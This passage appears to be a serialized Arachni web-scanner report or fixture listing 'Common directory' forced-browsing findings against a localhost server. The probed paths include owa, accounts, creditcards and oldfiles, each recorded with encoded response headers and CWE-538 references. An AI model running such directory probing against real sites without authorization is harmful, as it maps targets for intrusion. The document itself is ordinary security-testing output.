response: mrtg
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/owa/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/owa/
injected: owa
id: owa
elem: path
remarks: {}
method: ''
response: owa
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/other/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/other/
injected: other
id: other
elem: path
remarks: {}
method: ''
response: other
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/accounts/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/accounts/
injected: accounts
id: accounts
elem: path
remarks: {}
method: ''
response: accounts
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/warez/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/warez/
injected: warez
id: warez
elem: path
remarks: {}
method: ''
response: warez
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/my/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/my/
injected: my
id: my
elem: path
remarks: {}
method: ''
response: my
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mg==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cc/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cc/
injected: cc
id: cc
elem: path
remarks: {}
method: ''
response: cc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mg==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/creditcards/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/creditcards/
injected: creditcards
id: creditcards
elem: path
remarks: {}
method: ''
response: creditcards
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/contact/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/contact/
injected: contact
id: contact
elem: path
remarks: {}
method: ''
response: contact
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/press/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/press/
injected: press
id: press
elem: path
remarks: {}
method: ''
response: press
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/p0rn/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/p0rn/
injected: p0rn
id: p0rn
elem: path
remarks: {}
method: ''
response: p0rn
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/pron/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/pron/
injected: pron
id: pron
elem: path
remarks: {}
method: ''
response: pron
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/new%20folder/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/new%20folder/
injected: new%20folder
id: new%20folder
elem: path
remarks: {}
method: ''
response: new%20folder
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/New%20Folder/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/New%20Folder/
injected: New%20Folder
id: New%20Folder
elem: path
remarks: {}
method: ''
response: New%20Folder
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/oldfiles/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/oldfiles/
injected: oldfiles
id: oldfiles
elem: path
remarks: {}
method: ''
response: oldfiles
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/old_files/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/old_files/
injected: old_files
id: old_files
